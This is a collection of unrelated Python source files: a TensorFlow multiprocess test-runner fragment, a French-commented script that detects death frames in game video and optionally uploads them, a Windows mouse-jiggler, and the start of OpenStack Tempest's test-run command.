task_id: the task index.
initializer: a callable to execute during startup.
conn: a multiprocessing.Connection object to listen for tasks and send
results.
"""
if initializer:
initializer = dill.loads(initializer)
initializer()
while True:
try:
proc_func, args, kwargs = conn.recv()
except EOFError:
break
proc_func = dill.loads(proc_func)
info = _run_contained(task_type, task_id, proc_func, args, kwargs)
sys.stdout.flush()
sys.stderr.flush()
conn.send(info)
# Shutdown all MultiProcessPoolRunner in this process manually.
# MultiProcessPoolRunner registers an atexit callback to shutdown all pool
# runners, but we cannot rely on that in processes spawned by the
# multiprocessing library. This is because the library waits for all
# subprocesses before exiting and thus all atexit callbacks.
_shutdown_all_pool_runners()
def _run_contained(task_type, task_id, proc_func, args, kwargs):
"""Runs `proc_func` with `args` and `kwargs`.
The function returns _ProcessStatusInfo which captures the return value and
the exception.
Args:
task_type: the task type.
task_id: the task index.
proc_func: the function to be run.
args: optional positional arguments to be supplied in `proc_func`.
kwargs: optional keyword arguments to be supplied in `proc_func`.
Returns:
a _ProcessStatusInfo.
"""
is_successful = False
return_value = None
exc_info = None
try:
return_value = proc_func(*args, **kwargs)
is_successful = True
return _ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
# If `proc_func` ends up exiting with `sys.exit()`, the `SystemExit` is not
# handled here.
except Exception: # pylint: disable=broad-except
exc_info = sys.exc_info()
return _ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
class SubprocessTimeoutError(RuntimeError):
"""An error that indicates there is at least one subprocess timing out.
When this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute. See
`MultiProcessRunner.join()` for more information.
"""
def __init__(self, msg, mpr_result):
super(SubprocessTimeoutError, self).__init__(msg)
self.mpr_result = mpr_result
class UnexpectedSubprocessExitError(RuntimeError):
"""An error indicating there is at least one subprocess with unexpected exit.
When this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute. See
`MultiProcessRunner.join()` for more information.
"""
def __init__(self, msg, mpr_result):
super(UnexpectedSubprocessExitError, self).__init__(msg)
self.mpr_result = mpr_result
class MultiProcessRunnerNotInitializedError(RuntimeError):
"""An error indicating `MultiProcessRunner` is used without initialization.
When this is raised, user is supposed to call
`multi_process_runner.test_main()` within `if __name__ == '__main__':` block
to properly initialize `multi_process_runner`.
"""
pass
def _set_tf_config(task_type, task_id, cluster_spec, rpc_layer=None):
"""Set TF_CONFIG environment variable."""
tf_config_dict = {
'cluster': cluster_spec,
'task': {
'type': task_type,
'index': task_id,
},
}
if rpc_layer is not None:
tf_config_dict['rpc_layer'] = rpc_layer
os.environ['TF_CONFIG'] = json.dumps(tf_config_dict)
def run(proc_func,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_stdout=True,
list_stdout=False,
timeout=_DEFAULT_TIMEOUT_SEC,
args=None,
kwargs=None): # pylint: disable=g-doc-args
"""Runs functions in local child processes.
It is a convenience method that creates a `MultiProcessRunner` object and
invokes `start` and `join` method. Please see these methods for detailed
documentations.
Returns:
A MultiProcessRunnerResult object returned from `MultiProcessRunner.join()`.
"""
runner = MultiProcessRunner(
proc_func,
cluster_spec,
rpc_layer,
max_run_time=max_run_time,
grpc_fail_fast=grpc_fail_fast,
stream_stdout=stream_stdout,
list_stdout=list_stdout,
args=args,
kwargs=kwargs)
runner.start()
return runner.join(timeout)
# This is set by MultiProcessRunner in worker processes.
_barrier = None
def barrier():
if _barrier is None:
raise ValueError(
'barrier is not defined. It is likely because you are calling barrier()'
'in the main process. barrier() can only be called in the subprocesses.'
)
return _barrier
_manager = None
_manager_lock = threading.Lock()
def manager():
"""Returns the multiprocessing manager object for concurrency tools.
The manager object is useful as it controls a server process that holds
the python objects that can be shared across processes. This can be used
for parent-subprocess communication:
```python
manager = multi_process_runner.manager()
some_event_happening_in_subprocess = manager.Event()
mpr = multi_process_runner.MultiProcessRunner(proc_func, cluster_spec,
args=(some_event_happening_in_subprocess,))
mpr.start()
some_event_happening_in_subprocess.wait()
# Do something that only should after some event happens in subprocess.
```
Note that the user of multi_process_runner should not create additional
`multiprocessing.Manager()` objects; doing so can result in segfault in
some cases.
This method should only be called after multi_process_runner.test_main() is
called.
"""
global _manager
with _manager_lock:
if _manager is None:
_manager = multiprocessing.Manager()
return _manager
def test_main():
"""Main function to be called within `__main__` of a test file."""
multi_process_lib.test_main()
|
analyse_video.py
|
#!/usr/bin/env python
import argparse, math, atexit
import requests, hmac, hashlib
import subprocess,re,time,glob,os,shutil,configparser
from multiprocessing import Process, Queue, SimpleQueue, Pool
DEBUG = False
DIAGNOS = False
# le dossier où ça se passe
DIR = "_streams/"
# dossier des morts trouvées
DIRFOUND = DIR+"found/"
# dossier des morts réelles (après tri)
DIRTRUE = DIR+"deaths/"
# dossier des images temporaires
DIRIMG = DIR+"img/"
# dossier des segments temporaires
DIRVID = DIR+"ivid/"
# chemin de la vidéo source
SOURCE = DIR+"stream.mpg"
# exécutables ffmpeg/libav
FFMPEG_EXE = "ffmpeg"
FFMPEG_PROBE = "ffprobe"
# exécutables imagemagick
IMGMGK_COMP = "composite"
IMGMGK_CONV = "convert"
# numéro de la vidéo/session (incrémenter pour les avoir dans l'ordre)
NUMVID = str(int(1000*time.time()))
# formats des noms des fichiers (la partie après le num de la vidéo)
FORMATNOM = ""
# format des images utilisées pour la capture (jpg)
IMGEXT = "jpg"
# intervalle entre deux analyses (5) (secondes minimum dispo avant analyse)
timeStep = 5
# nombre de frames extraites par seconde (5)
FPS = 5
# nombre maximum de process simultanés d'analyse vidéo (1)
MAXPROCESS = 1
# effacer les fichiers intermédiaires (True)
DELETE = True
# upload les images sur le site (paramétrer) (False)
UPLOADFILES = False
# nombre de secondes min entre deux morts (4)
TIMEMARGIN = 4
# point de départ (pour communiquer aux sous process)
STARTAT = 0
# durée maximum
MAXLENGTH = 0
# temps à ajouter aux temps formatés (en secondes)
TIMERADD = 0
# temps de départ
STARTTIME = time.time()
# clef magique
MAGICKEY = b"REMPLACEZ MOI PAR LA CLEF SECRETE"
# page d'upload
UPLOADURL = 'https://quelquepart/chemin/compteur.php'
# cropage
CROPDIMS="212x48+171+134"
# nb dans le masque: 3741
MINPIXELON=800
# nb dans le masque: 6435
MAXPIXELOFF=1000
# masques
MASKON = "360/mask-on.png"
MASKOFF= "360/mask-off.png"
#####################################################################
#####################################################################
# pour le bug dans python pour MacOSX qui nique la ligne de commande
def restoreCommandLine():
subprocess.call(["stty","echo"])
#####################################################################
#####################################################################
def safeInt(input,defo=0):
try:
return int(input)
except:
return defo
#####################################################################
#####################################################################
def init_dirs():
global DIR,DIRFOUND,DIRTRUE,DIRIMG,DIRVID,SOURCE
DIRFOUND = DIR+"found/"
DIRTRUE = DIR+"deaths/"
DIRIMG = DIR+"img/"
DIRVID = DIR+"ivid/"
SOURCE = DIR+"stream.mpg"
for thedir in [DIRFOUND,DIRTRUE,DIRIMG,DIRVID]:
if not os.path.exists(thedir):
os.mkdir(thedir)
#####################################################################
#####################################################################
def init_res(res = "720fr"):
global CROPDIMS, MINPIXELON, MAXPIXELOFF, MASKON, MASKOFF
setupFile = res+"/setup.ini"
if os.path.exists(setupFile):
setup = configparser.ConfigParser()
setup.read(setupFile)
CROPDIMS = setup.get("masks","CROPDIMS",fallback="10x10+100+20")
MINPIXELON = setup.get("masks","MINPIXELON",fallback="2000")
MINPIXELON = safeInt(MINPIXELON, 2000)
MAXPIXELOFF = setup.get("masks","MAXPIXELOFF",fallback="4000")
MAXPIXELOFF = safeInt(MAXPIXELOFF, 4000)
MASKON = res+"/mask-on.png"
MASKOFF= res+"/mask-off.png"
print("CROPDIMS : "+str(CROPDIMS))
print("MINPIXELON : "+str(MINPIXELON))
print("MAXPIXELOFF : "+str(MAXPIXELOFF))
print("MASKON : "+str(MASKON))
print("MASKOFF : "+str(MASKOFF))
#####################################################################
#####################################################################
def formate_le_temps(timeStamp, isFrames=False):
if isFrames:
timeStamp = timeStamp / FPS
heures = math.floor(timeStamp / 60 / 60)
minutes = math.floor(timeStamp / 60) % 60
secondes = math.floor(timeStamp) % 60
return "%dh%02dm%02ds" % (heures,minutes,secondes)
#####################################################################
#####################################################################
def traite_la_mort(imageFile,imageName,remplace=""):
if UPLOADFILES:
UPLOADTRIES = 5
tries = UPLOADTRIES
while tries > 0:
try:
filehandle = open(imageFile, "rb")
filecode = hmac.new(MAGICKEY.encode(), imageName.encode('utf-8'), hashlib.sha1).hexdigest()
files = { 'file': (imageName, filehandle)}
data = {'filecode': filecode, 'remplace': remplace}
res = requests.post(UPLOADURL, files=files, data=data)
if res.text[0:2] != "OK":
print("UPLOAD ERROR "+imageName)
filehandle.close()
return "OK"
except Exception as e:
print("ERREUR RESEAU - ON RETENTE 2 OU 3 FOIS GENRE")
print(e)
time.sleep(0.01)
tries = tries - 1
#####################################################################
#####################################################################
def analyse_les_found(foundQueue):
allTheFound = list()
zoneDeRecherche = MAXPROCESS * FPS * TIMEMARGIN
while 1:
(nomImage, segmentTime, pixelOn) = foundQueue.get()
if nomImage == 0: break;
# trouver la frame dans le nom du fichier (1-based donc -1)
match = re.search(r"death_(\d+)_(\d+)\."+IMGEXT,nomImage)
frame = int(match.group(2)) - 1
timeStamp = segmentTime + frame / FPS + TIMERADD
# vrai "beau" nom
if FORMATNOM == "HMS":
fullNom = "death_"+NUMVID+"_%s_%d.%s" % (formate_le_temps(timeStamp), frame, IMGEXT)
else:
fullNom = "death_"+NUMVID+"_%07.1f.%s" % (timeStamp,IMGEXT)
# trouver les images dont le timestamp est proche
exists = False
iStart = max(0,len(allTheFound)-zoneDeRecherche)
iEnd = len(allTheFound)
for iFound in range(iStart,iEnd):
(iNomImage, iTimeStamp, iPixelOn) = allTheFound[iFound]
if abs(iTimeStamp-timeStamp) < TIMEMARGIN:
exists = True
if pixelOn > iPixelOn:
# remplacer iFound
print("BETTER ! %s (%d vs %d)" % (fullNom,pixelOn,iPixelOn))
allTheFound[iFound] = (fullNom, timeStamp, pixelOn)
shutil.move(DIRFOUND+nomImage,DIRTRUE+fullNom)
os.remove(DIRTRUE+iNomImage)
# réupload à chaque fois
traite_la_mort(DIRTRUE+fullNom,fullNom,remplace=iNomImage)
else:
# effacer le notre
os.remove(DIRFOUND+nomImage)
break
# enregistrer l'image et sa quantité de rouge
if not exists:
print("\nFOUND !! %s > %s (%d)" % (nomImage,fullNom,pixelOn))
allTheFound += [(fullNom, timeStamp, pixelOn)]
shutil.move(DIRFOUND+nomImage,DIRTRUE+fullNom)
traite_la_mort(DIRTRUE+fullNom,fullNom)
#
return foundQueue.put(allTheFound)
#####################################################################
#####################################################################
def analyse_image(foundQueue,segmentTime,fichierImage):
nomImage = os.path.basename(fichierImage)
# croper
com = [IMGMGK_CONV, fichierImage, "-crop", CROPDIMS, fichierImage+".c.png"]
subprocess.call(com)
# appliquer le masque, appliquer les seuils, calculer les pixels
tPIXELON = subprocess.check_output([IMGMGK_CONV,
"-compose", "Multiply", MASKOFF, fichierImage+".c.png", "-composite",
"-modulate", "100,500", "-fill", "Black", "-fuzz", "25%", "+opaque", "Red",
"(", "+clone", "-evaluate", "set", "0", ")", "-metric", "AE", "-compare", "-format", "%[distortion]", "info:"])
PIXELON = int(tPIXELON)
if DEBUG:
# appliquer le masque
com = [IMGMGK_COMP, "-compose", "Multiply", fichierImage+".c.png", MASKOFF, fichierImage+".m.png"]
subprocess.call(com)
# appliquer les seuils
com = [IMGMGK_CONV, fichierImage+".m.png", "-modulate", "100,500", "-fill", "Black", "-fuzz", "25%", "+opaque", "Red", fichierImage+".r.png"]
subprocess.call(com)
if DEBUG:
# appliquer le masque, appliquer les seuils, calculer les pixels
tPIXELOFF = subprocess.check_output([IMGMGK_CONV,
"-compose", "Multiply", MASKON, fichierImage+".c.png", "-composite",
"-modulate", "100,500",
"-fill", "Black", "-fuzz", "25%", "+opaque", "Red",
"(", "+clone", "-evaluate", "set", "0", ")", "-metric", "AE", "-compare", "-format", "%[distortion]", "info:"])
PIXELOFF = int(tPIXELOFF)
print("---- %s : %d / %d" % (nomImage,PIXELON,PIXELOFF))
if PIXELON > MINPIXELON:
# appliquer le masque, appliquer les seuils, calculer les pixels
if not DEBUG:
tPIXELOFF = subprocess.check_output([IMGMGK_CONV,
"-compose", "Multiply", MASKON, fichierImage+".c.png", "-composite",
"-modulate", "100,500",
"-fill", "Black", "-fuzz", "25%", "+opaque", "Red",
"(", "+clone", "-evaluate", "set", "0", ")", "-metric", "AE", "-compare", "-format", "%[distortion]", "info:"])
PIXELOFF = int(tPIXELOFF)
if DEBUG:
# appliquer le masque
com = [IMGMGK_COMP, "-compose", "Multiply", fichierImage+".c.png", MASKON, fichierImage+".n.png"]
subprocess.call(com)
# appliquer les seuils
com = [IMGMGK_CONV, fichierImage+".n.png", "-modulate", "100,500", fichierImage+".q.png"]
subprocess.call(com)
com = [IMGMGK_CONV, fichierImage+".q.png", "-fill", "Black", "-fuzz", "25%", "+opaque", "Red", fichierImage+".q.png"]
subprocess.call(com)
#print("%s: %6d /%6d" % (nomImage, PIXELON, PIXELOFF))
if PIXELOFF < max( MAXPIXELOFF, 0.5 * PIXELON ):
#print("FOUND !! "+nomImage)
shutil.copyfile(fichierImage,DIRFOUND+nomImage)
foundQueue.put( (nomImage,segmentTime,PIXELON) )
if DELETE:
for image in glob.glob(fichierImage+".*"):
os.remove(image)
return (PIXELON > MINPIXELON)
#####################################################################
#####################################################################
def analyse_video(segmentTime, syncQueue, foundQueue):
# diagnostics
nPixon = 0
temps_debut = time.time()
vid_ext = os.path.splitext(SOURCE)[1]
#
t_segmentTime = str(segmentTime)
p_segmentTime = "%05d" % (segmentTime)
#print("P"+p_segmentTime+" START")
#
FNULL = open(os.devnull, 'w')
#ffmpeg -i "$DIR/stream.mp4" -ss "$segmentTime" -t "$timeStep" -vf fps=5 "$DIR/img/death_$segmentTime_%04d.png"
###command = [FFMPEG_EXE, "-i", SOURCE, "-ss", segmentTime, "-t", str(timeStep), "-vf", "fps="+str(fps), DIR+"/img/death_"+p_segmentTime+"_%04d.jpg"]
###subprocess.call(command, stdout=FNULL, stderr=FNULL)
# on découpe la section de la vidéo correspondant (sans réencodage, sans le son)
# -ss AVANT le -i change la façon dont ça marche (fast seek avant, lent après)
command = [FFMPEG_EXE, "-y", "-ss", t_segmentTime, "-i", SOURCE, "-c", "copy", "-an", "-t", str(timeStep), DIRVID+"stream-"+p_segmentTime+vid_ext]
subprocess.call(command, stdout=FNULL, stderr=FNULL)
# on crée les images dans le dossier img en les taggant avec segmentTime
command = [FFMPEG_EXE, "-y", "-i", DIRVID+"stream-"+p_segmentTime+vid_ext, "-vf", "fps="+str(FPS), "-q:v", "1", DIRIMG+"death_"+p_segmentTime+"_%04d."+IMGEXT]
subprocess.call(command, stdout=FNULL, stderr=FNULL)
##temps_ffmpeg = "%0.2f" % (time.time() - temps_debut)
# pour chaque image
images = list(glob.glob(DIRIMG+"death_"+p_segmentTime+"_*."+IMGEXT))
for image in images:
# faire tout le boulot sur les images
(isPixon) = analyse_image(foundQueue,segmentTime,image)
if isPixon: nPixon += 1
# rm
if DELETE:
os.remove(DIRVID+"stream-"+p_segmentTime+vid_ext)
for image in images:
os.remove(image)
# calculs de temps et diagnostics
if DIAGNOS:
temps_total = "%0.2f" % (time.time() - temps_debut)
speedup = timeStep / (time.time() - temps_debut)
pctOn = "%0.1f" % ( 100 * nPixon/len(images) )
avance = (segmentTime + timeStep - STARTAT) - (time.time() - STARTTIME)
global_speedup = (segmentTime + timeStep - STARTAT) / (time.time() - STARTTIME)
#
print(
"P"+ ("%05d" % (segmentTime+TIMERADD))
+" Avance:%.1fs" % (avance)
+" (%0.2fx)" % (global_speedup)
+" Segment:"+temps_total+"s"
+" (%0.2fx)" % (speedup)
+" ON:"+pctOn+"%"
+" T:"+formate_le_temps(segmentTime)
+"\n"
)
else:
print(".",end="",flush=True)
syncQueue.put(segmentTime)
#####################################################################
#####################################################################
def videoLength():
bytes = subprocess.check_output([FFMPEG_PROBE, "-i", SOURCE, "-show_format", "-v", "quiet"])
data = str(bytes,'utf-8')
match = re.search(r"duration=(\d+\.\d*)",data)
duration = float(match.group(1))
return duration
#####################################################################
#####################################################################
def processStream(isLive = True):
print("Procs:%d\nStep:%d\nVideo:%s\nLive:%s\nUpload:%s"
% (MAXPROCESS, timeStep, SOURCE, ("non","oui")[isLive], ("non","oui")[UPLOADFILES]) )
if not os.path.exists(SOURCE):
print("La vidéo SOURCE n'existe pas !! "+SOURCE)
exit()
if DELETE:
for file in glob.glob(DIRIMG+"*"):
os.remove(file)
for file in glob.glob(DIRVID+"*"):
os.remove(file)
syncQueue = Queue()
foundQueue = Queue()
# temps analysé (secondes depuis le début de la vidéo)
segmentTime = STARTAT
# nombre de process en cours
nProcess = 0
# lancer un process qui va attendre de façon bloquante sur la foundQueue
# et sélectionner les images qu'il reçoit
pAnalyseLesFound = Process(target=analyse_les_found, args=(foundQueue,))
pAnalyseLesFound.start()
while True:
# tester la durée de la vidéo
duration = videoLength()
# tant qu'il reste de la vidéo à traiter (duration > segmentTime)
# - attendre qu'il y ait des workers de libre
# - traiter des segments
while duration > segmentTime + timeStep:
if nProcess >= MAXPROCESS:
out = syncQueue.get()
nProcess -= 1
# ICI on lance un process
#analyse_video(syncQueue,segmentTime,deltaT,foundQueue)
p = Process(target=analyse_video, args=(segmentTime, syncQueue, foundQueue,))
p.start()
nProcess += 1
# passage au step suivant
segmentTime += timeStep
# test de la durée maximum
if MAXLENGTH > 0:
if segmentTime >= STARTAT + MAXLENGTH:
break
# marqueur de temps à intervalle régulier
if segmentTime % (5*60) < timeStep:
print(formate_le_temps(segmentTime))
# quand on a traité tous les segments
# - si on n'est pas sur un live, traiter le dernier segment
# - si on est sur un live, boucler
if not isLive: break
if MAXLENGTH == 0:
p = Process(target=analyse_video, args=(segmentTime, syncQueue, foundQueue,))
p.start()
nProcess += 1
# attendre les process d'analyse vidéo
while nProcess > 0:
out = syncQueue.get()
nProcess -= 1
# fermer le process d'analyse des found
foundQueue.put((0,0,0))
pAnalyseLesFound.join()
# on a fini !
totalTime = time.time() - STARTTIME
print("\n")
print("Temps écoulé: %.1f" % (totalTime))
print("Temps analysé: %.1f" % (duration))
print("Efficacité: %.1fx" % (duration / totalTime))
#####################################################################
#####################################################################
def processImages():
foundQueue = Queue()
images = glob.glob(DIRIMG+"death_*."+IMGEXT)
# lancer un process qui va attendre de façon bloquante sur la foundQueue
# et sélectionner les images qu'il reçoit
pAnalyseLesFound = Process(target=analyse_les_found, args=(foundQueue,))
pAnalyseLesFound.start()
for fichierImage in images:
match = re.search(r"death_(\d+)_(\d+)\."+IMGEXT,fichierImage)
segmentTime = int(match.group(1))
print(".",end="")
analyse_image(foundQueue,segmentTime,fichierImage)
foundQueue.put((0,0,0))
pAnalyseLesFound.join()
allTheFound = foundQueue.get()
print("\nOn a trouvé %d morts !!" % (len(allTheFound)))
#####################################################################
#####################################################################
if __name__ == '__main__':
# pour le bug python MacOSX
atexit.register(restoreCommandLine)
# sélectionner images / stream / video selon les paramètres
# image trie les images found
# - les mettre dans deaths
# - supprimer de found ? ou quoi ?
# stream parse le stream
# video s'arrête à la fin de la video
parser = argparse.ArgumentParser()
parser.add_argument('--numsession', '-n', help='Numéro de la session (numéro de la VOD)') # required=True
parser.add_argument('--images', '-i', action='store_true', help='Analyser les images au lieu de la video')
parser.add_argument('--video', '-v', action='store_true', help='Analyser une vidéo fixe plutôt que le stream')
parser.add_argument('--upload', '-u', action='store_true', help='Uploader les vidéos sur le site')
parser.add_argument('--uploadurl', help='Url du script d\'upload des fichiers')
parser.add_argument('--uploadkey', help='Clef de sécurité pour le script')
parser.add_argument('--procs', '-p', help='Nombre maximum de process (1-8 typiquement)')
parser.add_argument('--step', '-s', help='Longueur du pas (en secondes)')
parser.add_argument('--maskdir', '-m', help='Dossier des données de masques')
parser.add_argument('--dir', help='Dossier racine des fichiers temporaires et de sortie')
parser.add_argument('--source', help='Chemin d\'accès du fichier vidéo source')
parser.add_argument('--format', help='Format du timestamp du nom des fichiers (HMS)')
parser.add_argument('--startat', help='Point de départ de l\'analyse (en secondes)')
parser.add_argument('--length', help='S\'arrêter après avoir analysé cette durée')
parser.add_argument('--addtime', help='Temps à ajouter au compteur lors de la création de fichier')
parser.add_argument('--nodelete', action='store_true', help='Ne pas effacer les fichiers temporaires')
parser.add_argument('--diagnos', action='store_true', help='Afficher les messages de diagnostique')
parser.add_argument('--debug', action='store_true', help='Créer des fichiers temporaires supplémentaires')
parser.add_argument('--png', action='store_true', help='Générer les captures en PNG (jpg par défaut)')
args = parser.parse_args()
#
try:
if int(args.procs) > 0:
MAXPROCESS = int(args.procs)
except:
pass
#
try:
if int(args.step) > 0:
timeStep = int(args.step)
except:
pass
#
try:
if int(args.length) > 0:
MAXLENGTH = int(args.length)
except:
pass
#
try:
if int(args.addtime) > 0:
TIMERADD = int(args.addtime)
except:
pass
#
if args.upload:
UPLOADFILES = True
#
if args.uploadurl:
UPLOADURL = args.uploadurl
#
if args.uploadkey:
MAGICKEY = args.uploadkey
#
if args.maskdir:
init_res(args.maskdir)
else:
init_res()
#
if args.numsession:
NUMVID = args.numsession
#
if args.dir:
if os.path.exists(args.dir):
DIR = args.dir
if DIR[-1:] != "/":
DIR = DIR + "/"
init_dirs()
#
if args.source:
SOURCE = args.source
#
if args.nodelete:
DELETE = False
#
if args.diagnos:
DIAGNOS = True
#
if args.debug:
DEBUG = True
#
if args.png:
IMGEXT = "png"
#
if args.format:
FORMATNOM = args.format
#
startat = 0
if args.startat:
mat = re.match(r'(\d+)h(\d+)m(\d+)s',args.startat)
if mat:
STARTAT = int(mat.group(1))*60*60+int(mat.group(2))*60+int(mat.group(3))
else:
try:
if int(args.startat) >= 0:
STARTAT = int(args.startat)
except:
pass
# TODO: tester l'existence de DIR / créer les sous dossiers
#
if args.images:
processImages()
elif args.video:
processStream(isLive = False)
else:
processStream(isLive = True)
|
mouse_handler.py
|
import datetime
import random
import sys
import threading
import time
import win32api
import win32con
SCREEN_WIDTH = win32api.GetSystemMetrics(0)
SCREEN_HEIGHT = win32api.GetSystemMetrics(1)
class Mouse_Handler:
def __init__(self):
# thread
self.active_thread = None
self.timer_handler_thread = None
# event
self.timer_countdown = None
self.movement_delay = None
def move_mouse(self, ui_input):
"""
Move mouse <offset> away relative to the current position every <delay>
seconds. 65535 is used to normalize absolute coordinates so we can get
the same movement regardless of screen size (0,0) to (65535,65535)
"""
# Initialize movement configuration
delay = ui_input.delay
offset = ui_input.offset
random_movement_enabled = ui_input.random_movement_enabled
random_delay_enabled = ui_input.random_delay_enabled
random_movement = ui_input.random_movement
min_random_movement = int(random_movement[0])
max_random_movement = int(random_movement[1])
random_delay = ui_input.random_delay
min_random_delay = int(random_delay[0])
max_random_delay = int(random_delay[1])
# Initialize random movement and delay modifier
random_x_movement_modifier = 0
random_y_movement_modifier = 0
random_delay_modifier = 0
random_x_direction = 1
random_y_direction = 1
while not self.movement_delay.is_set():
# Check if random movement is enabled
if random_movement_enabled:
random_x_movement_modifier = random.randint(min_random_movement, max_random_movement)
random_y_movement_modifier = random.randint(min_random_movement, max_random_movement)
random_x_direction = random.choice([1, -1])
random_y_direction = random.choice([1, -1])
# Calculate totala movement
total_x_movement = (offset + random_x_movement_modifier) * random_x_direction
total_y_movement = (offset + random_x_movement_modifier) * random_y_direction
# Check if random delay is enabled
if random_delay_enabled:
random_delay_modifier = random.randint(min_random_delay, max_random_delay)
# Perform the first movement
x, y = win32api.GetCursorPos()
win32api.mouse_event(
win32con.MOUSEEVENTF_MOVE | win32con.MOUSEEVENTF_ABSOLUTE,
int((x / SCREEN_WIDTH * 65535.0) + (total_x_movement)),
int((y / SCREEN_HEIGHT * 65535.0) + (total_y_movement))
)
self.movement_delay.wait(delay + random_delay_modifier)
# Perform the second movement
x, y = win32api.GetCursorPos()
win32api.mouse_event(
win32con.MOUSEEVENTF_MOVE | win32con.MOUSEEVENTF_ABSOLUTE,
int((x / SCREEN_WIDTH * 65535.0) - (total_x_movement)),
int((y / SCREEN_HEIGHT * 65535.0) - (total_y_movement))
)
self.movement_delay.wait(delay + random_delay_modifier)
def start_mouse_movement(self, ui_input):
# Initiate mouse movement
self.movement_delay = threading.Event()
mouse_movement_thread = threading.Thread(target=self.move_mouse, args=(ui_input,))
self.active_thread = mouse_movement_thread
mouse_movement_thread.start()
def stop_mouse_movement(self):
# Stop mouse movement
if self.movement_delay is not None:
self.movement_delay.set()
if self.active_thread is not None:
self.active_thread.join()
if self.timer_countdown is not None:
self.timer_countdown.set()
def start_timer(self, timer, ui):
# Initiate the timer handler and timer display handler
self.timer_handler_thread = threading.Thread(target=self.timer_handler, args=(timer, ui,))
self.timer_handler_thread.start()
self.display_timer_thread = threading.Thread(target=self.display_timer, args=(timer, ui,))
self.display_timer_thread.start()
def display_timer(self, timer, ui):
# Push the current timer value to UI
timer_start_time = time.time()
time_elapsed = 0
self.timer_countdown = threading.Event()
while time_elapsed <= timer and not self.timer_countdown.is_set():
# Update timer display in UI
timer_current_time = time.time()
time_elapsed = int(timer_current_time - timer_start_time)
time_left = timer - time_elapsed
ui.ui.currentTimerValue.setText(str(datetime.timedelta(seconds=time_left)))
def timer_handler(self, timer, ui):
# Start the timer
self.active_thread.join(timer)
self.movement_delay.set()
self.active_thread.join()
ui.stop_mouse_movement()
|
run.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Runs tempest tests
This command is used for running the tempest tests
Test Selection
==============
Tempest run has several options:
* **--regex/-r**: This is a selection regex like what testr uses. It will run
any tests that match on re.match() with the regex
* **--smoke/-s**: Run all the tests tagged as smoke
There are also the **--blacklist-file** and **--whitelist-file** options that
let you pass a filepath to tempest run with the file format being a line
separated regex, with '#' used to signify the start of a comment on a line.
For example::
# Regex file
^regex1 # Match these tests
.*regex2 # Match those tests
The blacklist file will be used to construct a negative lookahead regex and
the whitelist file will simply OR all the regexes in the file. The whitelist
and blacklist file options are mutually exclusive so you can't use them
together. However, you can combine either with a normal regex or the *--smoke*
flag. When used with a blacklist file the generated regex will be combined to
something like::
^((?!black_regex1|black_regex2).)*$cli_regex1
When combined with a whitelist file all the regexes from the file and the CLI
regexes will be ORed.
You can also use the **--list-tests** option in conjunction with selection
arguments to list which tests will be run.
You can also use the **--load-list** option that lets you pass a filepath to
tempest run with the file format being in a non-regex format, similar to the
tests generated by the **--list-tests** option. You can specify target tests
by removing unnecessary tests from a list file which is generated from
**--list-tests** option.
Test Execution
==============
There are several options to control how the tests are executed. By default
tempest will run in parallel with a worker for each CPU present on the machine.
If you want to adjust the number of workers use the **--concurrency** option
and if you want to run tests serially use **--serial/-t**
Running with Workspaces
-----------------------
Tempest run enables you to run your tempest tests from any setup tempest
workspace it relies on you having setup a tempest workspace with either the
``tempest init`` or ``tempest workspace`` commands. Then using the
``--workspace`` CLI option you can specify which one of your workspaces you
want to run tempest from. Using this option you don't have to run Tempest
directly with you current working directory being the workspace, Tempest will
take care of managing everything to be executed from there.
Running from Anywhere
---------------------
Tempest run provides you with an option to execute tempest from anywhere on
your system. You are required to provide a config file in this case with the
``--config-file`` option. When run tempest will create a .testrepository
directory and a .testr.conf file in your current working directory. This way
you can use testr commands directly to inspect the state of the previous run.
Test Output
===========
By default tempest run's output to STDOUT will be generated using the
subunit-trace output filter. But, if you would prefer a subunit v2 stream be
output to STDOUT use the **--subunit** flag
Combining Runs
==============
There are certain situations in which you want to split a single run of tempest
across 2 executions of tempest run. (for example to run part of the tests
serially and others in parallel) To accomplish this but still treat the results
as a single run you can leverage the **--combine** option which will append
the current run's results with the previous runs.
"""
import io
import os
import sys
import tempfile
import threading
from cliff import command
from os_testr import regex_builder
from os_testr import subunit_trace
from oslo_serialization import jsonutils as json
import six
from testrepository.commands import run_argv
from tempest import clients
from tempest.cmd import cleanup_service
from tempest.cmd import init
from tempest.cmd import workspace
from tempest.common import credentials_factory as credentials
from tempest import config
CONF = config.CONF
SAVED_STATE_JSON = "saved_state.json"
class TempestRun(command.Command):
def _set_env(self, config_file=None):
if config_file:
CONF.set_config_path(os.path.abspath(config_file))
# NOTE(mtreinish): This is needed so that testr doesn't gobble up any
# stacktraces on failure.
if 'TESTR_PDB' in os.environ:
return
else:
os.environ["TESTR_PDB"] = ""
# NOTE(dims): most of our .testr.conf try to test for PYTHON
# environment variable and fall back to "python", under python3
# if it does not exist. we should set it to the python3 executable
# to deal with this situation better for now.
if six.PY3 and 'PYTHON' not in os.environ:
os.environ['PYTHON'] = sys.executable
def _create_testrepository(self):
if not os.path.isdir('.testrepository'):
returncode = run_argv(['testr', 'init'], sys.stdin, sys.stdout,
sys.stderr)
if returncode:
sys.exit(returncode)
def _create_testr_conf(self):
top_level_path = os.path.dirname(os.path.dirname(__file__))
discover_path = os.path.join(top_level_path, 'test_discover')
file_contents = init.TESTR_CONF % (top_level_path, discover_path)
with open('.testr.conf', 'w+') as testr_conf_file:
testr_conf_file.write(file_contents)
def take_action(self, parsed_args):
returncode = 0
if parsed_args.config_file:
self._set_env(parsed_args.config_file)
else:
self._set_env()
# Workspace execution mode
if parsed_args.workspace:
workspace_mgr = workspace.WorkspaceManager(
parsed_args.workspace_path)
